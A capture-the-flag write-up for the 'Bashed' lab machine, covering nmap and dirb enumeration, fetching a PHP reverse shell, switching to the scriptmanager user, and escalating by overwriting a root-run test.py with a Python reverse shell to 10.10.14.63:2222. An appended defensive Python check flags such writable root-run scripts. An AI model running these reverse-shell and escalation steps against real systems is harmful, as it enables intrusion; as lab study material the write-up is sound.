Bashed Write-Up

1- Network enumeration:

nmap -sV -sC 10.129.156.242 -p 80

-sV to determine service/version info
-sC to use the default Nmap scripts
  • The HTTP port is open.

2- Directory brute force:

nmap --script=http-enum 10.129.156.242 -p 80
$ dirb http://10.129.155.176/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
$ python3 -m http.server 12344
$ wget 10.10.14.63:12344/revers.php
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@bashed:/$ ls -la
www-data@bashed:/$ sudo -u scriptmanager bash
scriptmanager@bashed:/$
scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 217 Mar 15 10:49 test.py
-rw-r--r-- 1 root root 12 Mar 15 10:38 test.txt
scriptmanager@bashed:/scripts$
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$
scriptmanager@bashed:/scripts$ cat test.txt
testing 123!scriptmanager@bashed:/scripts$

4-Escalation:

echo 'import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.63",2222))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ' >test.py
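
The /scripts listing above shows the condition that step 4 relies on: test.py is owned by scriptmanager, while test.txt, the file it writes, is owned by root, which indicates the script is being run as root. As an added example (not part of the original write-up), this Python check parses an `ls -la` listing and flags that pattern; the function names and the list of script extensions are assumptions made for illustration.

```python
import re

# Constructed sample: the `ls -la` output of /scripts as shown in the write-up.
SAMPLE = """\
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 217 Mar 15 10:49 test.py
-rw-r--r-- 1 root root 12 Mar 15 10:38 test.txt
"""

# Assumption: these extensions are what counts as a "script" for this audit.
SCRIPT_EXT = re.compile(r"\.(py|sh|pl|rb|php)$")

def parse_ls(listing):
    """Parse `ls -la` lines into dicts; lines that are not entries are skipped."""
    entries = []
    for line in listing.splitlines():
        parts = line.split(None, 8)
        if len(parts) == 9 and re.fullmatch(r"[-dlbcps][-rwxsStT]{9}[.+@]?", parts[0]):
            entries.append({"mode": parts[0], "owner": parts[2],
                            "group": parts[3], "name": parts[8]})
    return entries

def non_root_can_write(e):
    """True if some account other than root holds a write bit on this entry."""
    m = e["mode"]
    return ((m[2] == "w" and e["owner"] != "root")
            or (m[5] == "w" and e["group"] != "root")
            or m[8] == "w")

def audit(listing):
    """Flag scripts a non-root user can change that sit next to root-owned files."""
    entries = parse_ls(listing)
    here = next((e for e in entries if e["name"] == "."), None)
    dir_writable = here is not None and non_root_can_write(here)
    files = [e for e in entries if e["mode"][0] == "-"]
    root_output = [e["name"] for e in files if e["owner"] == "root"
                   and not SCRIPT_EXT.search(e["name"])]
    # Write access to the directory allows replacing files in it (absent the sticky bit).
    return [(e["name"], e["owner"], root_output) for e in files
            if SCRIPT_EXT.search(e["name"]) and root_output
            and (dir_writable or non_root_can_write(e))]

if __name__ == "__main__":
    for name, owner, outputs in audit(SAMPLE):
        print(f"{name} (owner {owner}): non-root can modify; root-owned: {outputs}")
```

A script that root executes should be owned by root, not writable by any other account, and kept in a directory with the same restrictions; with those permissions the check returns no findings.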

Mohamed isselmou

@isselmou
